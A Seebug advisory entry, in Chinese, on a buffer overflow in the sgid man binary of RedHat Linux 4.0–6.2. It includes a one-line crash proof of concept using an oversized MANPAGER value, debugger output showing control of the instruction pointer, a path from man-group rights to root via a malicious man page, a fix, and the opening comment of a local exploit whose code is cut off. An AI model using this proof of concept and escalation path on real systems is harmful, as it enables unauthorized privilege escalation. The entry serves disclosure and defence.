RedHat man 缓冲区溢出漏洞

2008-07-16T00:00:00
ID SSV:3658
Type seebug
Reporter Root
Modified 2008-07-16T00:00:00

Description

在大多数的Linux发布中,/usr/bin/man被设置了sgid man位.设置这一位是为了在 /var/catman目录下创建预先格式化好的man手册页,以便提高访问速度。然而,man 程序多次使用sprintf函数将用户输入的数据储存到固定大小的缓冲区中。这导致用 户可以提供超长的数据来使缓冲区溢出,获得man gid权限,进一步甚至可能获得root 权限。

比如,通过设置MANOAGER变量为超过4000个'A'的字符串,将导致缓冲区溢出:

$ MANPAGER=perl -e '{print "A"x4000}' man ls

[...]

1200 setuid(500) = 0 1200 setgid(15) = 0 1200 open("/usr/share/locale/pl/man", O_RDONLY) = -1 ENOENT (No such file or directory) 1200 open("/usr/share/locale/pl/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No such file or directory)1200 open("/usr/share/locale/pl/man", O_RDONLY) = -1 ENOENT (No such file or directory) 1200 open("/usr/share/locale/pl/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No such file or directory)1200 close(-1) = -1 EBADF (Bad file descriptor) 1200 write(2, "Error executing formatting or display command.\nSystem command (cd /usr/man ; (echo 1200 --- SIGSEGV (Naruszenie ochrony pami?ci) --- 1200 +++ killed by SIGSEGV +++

Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? ()

如果用户获得了man gid权限,他就可以对/var/catman目录或者是一些在/usr/man 目录下的文件进行读写。通常情况下,/usr/man下的文件"man"是不可写的,但是有 些程序可能允许用户组man写它们的man页。因此用户可能通过构造一个恶意的man页, 当root浏览这个程序的man页时,任意代码将被执行,从而恶意用户可能获得root权 限。

RedHat Linux 6.2 RedHat Linux 6.1 RedHat Linux 6.0 RedHat Linux 5.2 RedHat Linux 5.1 RedHat Linux 5.0 RedHat Linux 4.2 RedHat Linux 4.1 RedHat Linux 4.0 删除/usr/bin/man的sgid位, chmod g-s /usr/bin/man .(注意这样它就不能在/var/catman 中创建预格式化好的man页了)

                                        
                                            
                                                /*  /usr/bin/man overflow local exploit for Linux.
*  Tested in RedHat 6.1 (2.2.14),RedHat 6.0 (ALIGN=0)
*  It will give you gid "man" privledges,now you can play
*  with /var/catman.:-) 
*                       by warning3 <warning3